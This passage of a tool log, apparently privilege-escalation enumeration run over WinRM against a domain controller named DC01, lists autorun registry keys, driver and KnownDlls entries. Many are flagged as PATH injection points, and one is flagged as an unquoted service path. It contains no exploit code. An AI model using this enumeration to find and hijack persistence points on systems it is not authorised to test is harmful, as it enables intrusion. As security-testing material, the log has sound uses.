WINRM       172.16.55.128   5985   DC01                =================================================================================================
786
WINRM       172.16.55.128   5985   DC01
787
WINRM       172.16.55.128   5985   DC01
788
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
789
WINRM       172.16.55.128   5985   DC01                 Key: Common Startup
790
WINRM       172.16.55.128   5985   DC01                 Folder: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
791
WINRM       172.16.55.128   5985   DC01                =================================================================================================
792
WINRM       172.16.55.128   5985   DC01
793
WINRM       172.16.55.128   5985   DC01
794
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
795
WINRM       172.16.55.128   5985   DC01                 Key: Userinit
796
WINRM       172.16.55.128   5985   DC01                 Folder: C:\Windows\system32
797
WINRM       172.16.55.128   5985   DC01                 File: C:\Windows\system32\userinit.exe,
798
WINRM       172.16.55.128   5985   DC01                =================================================================================================
799
WINRM       172.16.55.128   5985   DC01
800
WINRM       172.16.55.128   5985   DC01
801
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
802
WINRM       172.16.55.128   5985   DC01                 Key: Shell
803
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
804
WINRM       172.16.55.128   5985   DC01                 File: explorer.exe
805
WINRM       172.16.55.128   5985   DC01                =================================================================================================
806
WINRM       172.16.55.128   5985   DC01
807
WINRM       172.16.55.128   5985   DC01
808
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot
809
WINRM       172.16.55.128   5985   DC01                 Key: AlternateShell
810
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
811
WINRM       172.16.55.128   5985   DC01                 File: cmd.exe
812
WINRM       172.16.55.128   5985   DC01                =================================================================================================
813
WINRM       172.16.55.128   5985   DC01
814
WINRM       172.16.55.128   5985   DC01
815
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Font Drivers
816
WINRM       172.16.55.128   5985   DC01                 Key: Adobe Type Manager
817
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
818
WINRM       172.16.55.128   5985   DC01                 File: atmfd.dll
819
WINRM       172.16.55.128   5985   DC01                =================================================================================================
820
WINRM       172.16.55.128   5985   DC01
821
WINRM       172.16.55.128   5985   DC01
822
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Font Drivers
823
WINRM       172.16.55.128   5985   DC01                 Key: Adobe Type Manager
824
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
825
WINRM       172.16.55.128   5985   DC01                 File: atmfd.dll
826
WINRM       172.16.55.128   5985   DC01                =================================================================================================
827
WINRM       172.16.55.128   5985   DC01
828
WINRM       172.16.55.128   5985   DC01
829
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32
830
WINRM       172.16.55.128   5985   DC01                 Key: aux
831
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
832
WINRM       172.16.55.128   5985   DC01                 File: wdmaud.drv
833
WINRM       172.16.55.128   5985   DC01                =================================================================================================
834
WINRM       172.16.55.128   5985   DC01
835
WINRM       172.16.55.128   5985   DC01
836
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32
837
WINRM       172.16.55.128   5985   DC01                 Key: midi
838
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
839
WINRM       172.16.55.128   5985   DC01                 File: wdmaud.drv
840
WINRM       172.16.55.128   5985   DC01                =================================================================================================
841
WINRM       172.16.55.128   5985   DC01
842
WINRM       172.16.55.128   5985   DC01
843
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32
844
WINRM       172.16.55.128   5985   DC01                 Key: midimapper
845
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
846
WINRM       172.16.55.128   5985   DC01                 File: midimap.dll
847
WINRM       172.16.55.128   5985   DC01                =================================================================================================
848
WINRM       172.16.55.128   5985   DC01
849
WINRM       172.16.55.128   5985   DC01
850
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32
851
WINRM       172.16.55.128   5985   DC01                 Key: mixer
852
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
853
WINRM       172.16.55.128   5985   DC01                 File: wdmaud.drv
854
WINRM       172.16.55.128   5985   DC01                =================================================================================================
855
WINRM       172.16.55.128   5985   DC01
856
WINRM       172.16.55.128   5985   DC01
857
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32
858
WINRM       172.16.55.128   5985   DC01                 Key: msacm.imaadpcm
859
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
860
WINRM       172.16.55.128   5985   DC01                 File: imaadp32.acm
861
WINRM       172.16.55.128   5985   DC01                =================================================================================================
862
WINRM       172.16.55.128   5985   DC01
863
WINRM       172.16.55.128   5985   DC01
864
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32
865
WINRM       172.16.55.128   5985   DC01                 Key: msacm.l3acm
866
WINRM       172.16.55.128   5985   DC01                 Folder: C:\Windows\System32
867
WINRM       172.16.55.128   5985   DC01                 File: C:\Windows\System32\l3codeca.acm
868
WINRM       172.16.55.128   5985   DC01                =================================================================================================
869
WINRM       172.16.55.128   5985   DC01
870
WINRM       172.16.55.128   5985   DC01
871
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32
872
WINRM       172.16.55.128   5985   DC01                 Key: msacm.msadpcm
873
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
874
WINRM       172.16.55.128   5985   DC01                 File: msadp32.acm
875
WINRM       172.16.55.128   5985   DC01                =================================================================================================
876
WINRM       172.16.55.128   5985   DC01
877
WINRM       172.16.55.128   5985   DC01
878
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32
879
WINRM       172.16.55.128   5985   DC01                 Key: msacm.msg711
880
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
881
WINRM       172.16.55.128   5985   DC01                 File: msg711.acm
882
WINRM       172.16.55.128   5985   DC01                =================================================================================================
883
WINRM       172.16.55.128   5985   DC01
884
WINRM       172.16.55.128   5985   DC01
885
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32
886
WINRM       172.16.55.128   5985   DC01                 Key: msacm.msgsm610
887
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
888
WINRM       172.16.55.128   5985   DC01                 File: msgsm32.acm
889
WINRM       172.16.55.128   5985   DC01                =================================================================================================
890
WINRM       172.16.55.128   5985   DC01
891
WINRM       172.16.55.128   5985   DC01
892
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32
893
WINRM       172.16.55.128   5985   DC01                 Key: vidc.i420
894
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
895
WINRM       172.16.55.128   5985   DC01                 File: iyuv_32.dll
896
WINRM       172.16.55.128   5985   DC01                =================================================================================================
897
WINRM       172.16.55.128   5985   DC01
898
WINRM       172.16.55.128   5985   DC01
899
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32
900
WINRM       172.16.55.128   5985   DC01                 Key: vidc.iyuv
901
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
902
WINRM       172.16.55.128   5985   DC01                 File: iyuv_32.dll
903
WINRM       172.16.55.128   5985   DC01                =================================================================================================
904
WINRM       172.16.55.128   5985   DC01
905
WINRM       172.16.55.128   5985   DC01
906
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32
907
WINRM       172.16.55.128   5985   DC01                 Key: vidc.mrle
908
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
909
WINRM       172.16.55.128   5985   DC01                 File: msrle32.dll
910
WINRM       172.16.55.128   5985   DC01                =================================================================================================
911
WINRM       172.16.55.128   5985   DC01
912
WINRM       172.16.55.128   5985   DC01
913
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32
914
WINRM       172.16.55.128   5985   DC01                 Key: vidc.msvc
915
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
916
WINRM       172.16.55.128   5985   DC01                 File: msvidc32.dll
917
WINRM       172.16.55.128   5985   DC01                =================================================================================================
918
WINRM       172.16.55.128   5985   DC01
919
WINRM       172.16.55.128   5985   DC01
920
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32
921
WINRM       172.16.55.128   5985   DC01                 Key: vidc.uyvy
922
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
923
WINRM       172.16.55.128   5985   DC01                 File: msyuv.dll
924
WINRM       172.16.55.128   5985   DC01                =================================================================================================
925
WINRM       172.16.55.128   5985   DC01
926
WINRM       172.16.55.128   5985   DC01
927
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32
928
WINRM       172.16.55.128   5985   DC01                 Key: vidc.yuy2
929
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
930
WINRM       172.16.55.128   5985   DC01                 File: msyuv.dll
931
WINRM       172.16.55.128   5985   DC01                =================================================================================================
932
WINRM       172.16.55.128   5985   DC01
933
WINRM       172.16.55.128   5985   DC01
934
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32
935
WINRM       172.16.55.128   5985   DC01                 Key: vidc.yvu9
936
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
937
WINRM       172.16.55.128   5985   DC01                 File: tsbyuv.dll
938
WINRM       172.16.55.128   5985   DC01                =================================================================================================
939
WINRM       172.16.55.128   5985   DC01
940
WINRM       172.16.55.128   5985   DC01
941
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32
942
WINRM       172.16.55.128   5985   DC01                 Key: vidc.yvyu
943
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
944
WINRM       172.16.55.128   5985   DC01                 File: msyuv.dll
945
WINRM       172.16.55.128   5985   DC01                =================================================================================================
946
WINRM       172.16.55.128   5985   DC01
947
WINRM       172.16.55.128   5985   DC01
948
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32
949
WINRM       172.16.55.128   5985   DC01                 Key: wave
950
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
951
WINRM       172.16.55.128   5985   DC01                 File: wdmaud.drv
952
WINRM       172.16.55.128   5985   DC01                =================================================================================================
953
WINRM       172.16.55.128   5985   DC01
954
WINRM       172.16.55.128   5985   DC01
955
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32
956
WINRM       172.16.55.128   5985   DC01                 Key: wavemapper
957
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
958
WINRM       172.16.55.128   5985   DC01                 File: msacm32.drv
959
WINRM       172.16.55.128   5985   DC01                =================================================================================================
960
WINRM       172.16.55.128   5985   DC01
961
WINRM       172.16.55.128   5985   DC01
962
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32
963
WINRM       172.16.55.128   5985   DC01                 Key: aux
964
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
965
WINRM       172.16.55.128   5985   DC01                 File: wdmaud.drv
966
WINRM       172.16.55.128   5985   DC01                =================================================================================================
967
WINRM       172.16.55.128   5985   DC01
968
WINRM       172.16.55.128   5985   DC01
969
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32
970
WINRM       172.16.55.128   5985   DC01                 Key: midi
971
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
972
WINRM       172.16.55.128   5985   DC01                 File: wdmaud.drv
973
WINRM       172.16.55.128   5985   DC01                =================================================================================================
974
WINRM       172.16.55.128   5985   DC01
975
WINRM       172.16.55.128   5985   DC01
976
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32
977
WINRM       172.16.55.128   5985   DC01                 Key: midimapper
978
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
979
WINRM       172.16.55.128   5985   DC01                 File: midimap.dll
980
WINRM       172.16.55.128   5985   DC01                =================================================================================================
981
WINRM       172.16.55.128   5985   DC01
982
WINRM       172.16.55.128   5985   DC01
983
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32
984
WINRM       172.16.55.128   5985   DC01                 Key: mixer
985
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
986
WINRM       172.16.55.128   5985   DC01                 File: wdmaud.drv
987
WINRM       172.16.55.128   5985   DC01                =================================================================================================
988
WINRM       172.16.55.128   5985   DC01
989
WINRM       172.16.55.128   5985   DC01
990
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32
991
WINRM       172.16.55.128   5985   DC01                 Key: msacm.imaadpcm
992
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
993
WINRM       172.16.55.128   5985   DC01                 File: imaadp32.acm
994
WINRM       172.16.55.128   5985   DC01                =================================================================================================
995
WINRM       172.16.55.128   5985   DC01
996
WINRM       172.16.55.128   5985   DC01
997
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32
998
WINRM       172.16.55.128   5985   DC01                 Key: msacm.l3acm
999
WINRM       172.16.55.128   5985   DC01                 Folder: C:\Windows\SysWOW64
1000
WINRM       172.16.55.128   5985   DC01                 File: C:\Windows\SysWOW64\l3codeca.acm
1001
WINRM       172.16.55.128   5985   DC01                =================================================================================================
1002
WINRM       172.16.55.128   5985   DC01
1003
WINRM       172.16.55.128   5985   DC01
1004
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32
1005
WINRM       172.16.55.128   5985   DC01                 Key: msacm.msadpcm
1006
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
1007
WINRM       172.16.55.128   5985   DC01                 File: msadp32.acm
1008
WINRM       172.16.55.128   5985   DC01                =================================================================================================
1009
WINRM       172.16.55.128   5985   DC01
1010
WINRM       172.16.55.128   5985   DC01
1011
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32
1012
WINRM       172.16.55.128   5985   DC01                 Key: msacm.msg711
1013
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
1014
WINRM       172.16.55.128   5985   DC01                 File: msg711.acm
1015
WINRM       172.16.55.128   5985   DC01                =================================================================================================
1016
WINRM       172.16.55.128   5985   DC01
1017
WINRM       172.16.55.128   5985   DC01
1018
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32
1019
WINRM       172.16.55.128   5985   DC01                 Key: msacm.msgsm610
1020
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
1021
WINRM       172.16.55.128   5985   DC01                 File: msgsm32.acm
1022
WINRM       172.16.55.128   5985   DC01                =================================================================================================
1023
WINRM       172.16.55.128   5985   DC01
1024
WINRM       172.16.55.128   5985   DC01
1025
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32
1026
WINRM       172.16.55.128   5985   DC01                 Key: vidc.cvid
1027
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
1028
WINRM       172.16.55.128   5985   DC01                 File: iccvid.dll
1029
WINRM       172.16.55.128   5985   DC01                =================================================================================================
1030
WINRM       172.16.55.128   5985   DC01
1031
WINRM       172.16.55.128   5985   DC01
1032
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32
1033
WINRM       172.16.55.128   5985   DC01                 Key: vidc.i420
1034
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
1035
WINRM       172.16.55.128   5985   DC01                 File: iyuv_32.dll
1036
WINRM       172.16.55.128   5985   DC01                =================================================================================================
1037
WINRM       172.16.55.128   5985   DC01
1038
WINRM       172.16.55.128   5985   DC01
1039
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32
1040
WINRM       172.16.55.128   5985   DC01                 Key: vidc.iyuv
1041
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
1042
WINRM       172.16.55.128   5985   DC01                 File: iyuv_32.dll
1043
WINRM       172.16.55.128   5985   DC01                =================================================================================================
1044
WINRM       172.16.55.128   5985   DC01
1045
WINRM       172.16.55.128   5985   DC01
1046
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32
1047
WINRM       172.16.55.128   5985   DC01                 Key: vidc.mrle
1048
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
1049
WINRM       172.16.55.128   5985   DC01                 File: msrle32.dll
1050
WINRM       172.16.55.128   5985   DC01                =================================================================================================
1051
WINRM       172.16.55.128   5985   DC01
1052
WINRM       172.16.55.128   5985   DC01
1053
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32
1054
WINRM       172.16.55.128   5985   DC01                 Key: vidc.msvc
1055
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
1056
WINRM       172.16.55.128   5985   DC01                 File: msvidc32.dll
1057
WINRM       172.16.55.128   5985   DC01                =================================================================================================
1058
WINRM       172.16.55.128   5985   DC01
1059
WINRM       172.16.55.128   5985   DC01
1060
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32
1061
WINRM       172.16.55.128   5985   DC01                 Key: vidc.uyvy
1062
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
1063
WINRM       172.16.55.128   5985   DC01                 File: msyuv.dll
1064
WINRM       172.16.55.128   5985   DC01                =================================================================================================
1065
WINRM       172.16.55.128   5985   DC01
1066
WINRM       172.16.55.128   5985   DC01
1067
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32
1068
WINRM       172.16.55.128   5985   DC01                 Key: vidc.yuy2
1069
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
1070
WINRM       172.16.55.128   5985   DC01                 File: msyuv.dll
1071
WINRM       172.16.55.128   5985   DC01                =================================================================================================
1072
WINRM       172.16.55.128   5985   DC01
1073
WINRM       172.16.55.128   5985   DC01
1074
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32
1075
WINRM       172.16.55.128   5985   DC01                 Key: vidc.yvu9
1076
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
1077
WINRM       172.16.55.128   5985   DC01                 File: tsbyuv.dll
1078
WINRM       172.16.55.128   5985   DC01                =================================================================================================
1079
WINRM       172.16.55.128   5985   DC01
1080
WINRM       172.16.55.128   5985   DC01
1081
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32
1082
WINRM       172.16.55.128   5985   DC01                 Key: vidc.yvyu
1083
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
1084
WINRM       172.16.55.128   5985   DC01                 File: msyuv.dll
1085
WINRM       172.16.55.128   5985   DC01                =================================================================================================
1086
WINRM       172.16.55.128   5985   DC01
1087
WINRM       172.16.55.128   5985   DC01
1088
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32
1089
WINRM       172.16.55.128   5985   DC01                 Key: wave
1090
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
1091
WINRM       172.16.55.128   5985   DC01                 File: wdmaud.drv
1092
WINRM       172.16.55.128   5985   DC01                =================================================================================================
1093
WINRM       172.16.55.128   5985   DC01
1094
WINRM       172.16.55.128   5985   DC01
1095
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32
1096
WINRM       172.16.55.128   5985   DC01                 Key: wavemapper
1097
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
1098
WINRM       172.16.55.128   5985   DC01                 File: msacm32.drv
1099
WINRM       172.16.55.128   5985   DC01                =================================================================================================
1100
WINRM       172.16.55.128   5985   DC01
1101
WINRM       172.16.55.128   5985   DC01
1102
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Classes\htmlfile\shell\open\command
1103
WINRM       172.16.55.128   5985   DC01                 Folder: C:\Program Files\Internet Explorer
1104
WINRM       172.16.55.128   5985   DC01                 File: C:\Program Files\Internet Explorer\iexplore.exe %1 (Unquoted and Space detected) - C:\
1105
WINRM       172.16.55.128   5985   DC01                =================================================================================================
1106
WINRM       172.16.55.128   5985   DC01
1107
WINRM       172.16.55.128   5985   DC01
1108
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
1109
WINRM       172.16.55.128   5985   DC01                 Key: *kernel32
1110
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
1111
WINRM       172.16.55.128   5985   DC01                 File: kernel32.dll
1112
WINRM       172.16.55.128   5985   DC01                =================================================================================================
1113
WINRM       172.16.55.128   5985   DC01
1114
WINRM       172.16.55.128   5985   DC01
1115
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
1116
WINRM       172.16.55.128   5985   DC01                 Key: _wow64cpu
1117
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
1118
WINRM       172.16.55.128   5985   DC01                 File: wow64cpu.dll
1119
WINRM       172.16.55.128   5985   DC01                =================================================================================================
1120
WINRM       172.16.55.128   5985   DC01
1121
WINRM       172.16.55.128   5985   DC01
1122
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
1123
WINRM       172.16.55.128   5985   DC01                 Key: _wowarmhw
1124
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
1125
WINRM       172.16.55.128   5985   DC01                 File: wowarmhw.dll
1126
WINRM       172.16.55.128   5985   DC01                =================================================================================================
1127
WINRM       172.16.55.128   5985   DC01
1128
WINRM       172.16.55.128   5985   DC01
1129
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
1130
WINRM       172.16.55.128   5985   DC01                 Key: _xtajit
1131
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
1132
WINRM       172.16.55.128   5985   DC01                 File: xtajit.dll
1133
WINRM       172.16.55.128   5985   DC01                =================================================================================================
1134
WINRM       172.16.55.128   5985   DC01
1135
WINRM       172.16.55.128   5985   DC01
1136
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
1137
WINRM       172.16.55.128   5985   DC01                 Key: _xtajit64
1138
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
1139
WINRM       172.16.55.128   5985   DC01                 File: xtajit64.dll
1140
WINRM       172.16.55.128   5985   DC01                =================================================================================================
1141
WINRM       172.16.55.128   5985   DC01
1142
WINRM       172.16.55.128   5985   DC01
1143
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
1144
WINRM       172.16.55.128   5985   DC01                 Key: advapi32
1145
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
1146
WINRM       172.16.55.128   5985   DC01                 File: advapi32.dll
1147
WINRM       172.16.55.128   5985   DC01                =================================================================================================
1148
WINRM       172.16.55.128   5985   DC01
1149
WINRM       172.16.55.128   5985   DC01
1150
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
1151
WINRM       172.16.55.128   5985   DC01                 Key: clbcatq
1152
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
1153
WINRM       172.16.55.128   5985   DC01                 File: clbcatq.dll
1154
WINRM       172.16.55.128   5985   DC01                =================================================================================================
1155
WINRM       172.16.55.128   5985   DC01
1156
WINRM       172.16.55.128   5985   DC01
1157
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
1158
WINRM       172.16.55.128   5985   DC01                 Key: combase
1159
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
1160
WINRM       172.16.55.128   5985   DC01                 File: combase.dll
1161
WINRM       172.16.55.128   5985   DC01                =================================================================================================
1162
WINRM       172.16.55.128   5985   DC01
1163
WINRM       172.16.55.128   5985   DC01
1164
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
1165
WINRM       172.16.55.128   5985   DC01                 Key: COMDLG32
1166
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
1167
WINRM       172.16.55.128   5985   DC01                 File: COMDLG32.dll
1168
WINRM       172.16.55.128   5985   DC01                =================================================================================================
1169
WINRM       172.16.55.128   5985   DC01
1170
WINRM       172.16.55.128   5985   DC01
1171
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
1172
WINRM       172.16.55.128   5985   DC01                 Key: coml2
1173
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
1174
WINRM       172.16.55.128   5985   DC01                 File: coml2.dll
1175
WINRM       172.16.55.128   5985   DC01                =================================================================================================
1176
WINRM       172.16.55.128   5985   DC01
1177
WINRM       172.16.55.128   5985   DC01
1178
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
1179
WINRM       172.16.55.128   5985   DC01                 Key: DifxApi
1180
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
1181
WINRM       172.16.55.128   5985   DC01                 File: difxapi.dll
1182
WINRM       172.16.55.128   5985   DC01                =================================================================================================
1183
WINRM       172.16.55.128   5985   DC01
1184
WINRM       172.16.55.128   5985   DC01
1185
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
1186
WINRM       172.16.55.128   5985   DC01                 Key: gdi32
1187
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
1188
WINRM       172.16.55.128   5985   DC01                 File: gdi32.dll
1189
WINRM       172.16.55.128   5985   DC01                =================================================================================================
1190
WINRM       172.16.55.128   5985   DC01
1191
WINRM       172.16.55.128   5985   DC01
1192
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
1193
WINRM       172.16.55.128   5985   DC01                 Key: gdiplus
1194
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
1195
WINRM       172.16.55.128   5985   DC01                 File: gdiplus.dll
1196
WINRM       172.16.55.128   5985   DC01                =================================================================================================
1197
WINRM       172.16.55.128   5985   DC01
1198
WINRM       172.16.55.128   5985   DC01
1199
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
1200
WINRM       172.16.55.128   5985   DC01                 Key: IMAGEHLP
1201
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
1202
WINRM       172.16.55.128   5985   DC01                 File: IMAGEHLP.dll
1203
WINRM       172.16.55.128   5985   DC01                =================================================================================================
1204
WINRM       172.16.55.128   5985   DC01
1205
WINRM       172.16.55.128   5985   DC01
1206
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
1207
WINRM       172.16.55.128   5985   DC01                 Key: IMM32
1208
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
1209
WINRM       172.16.55.128   5985   DC01                 File: IMM32.dll
1210
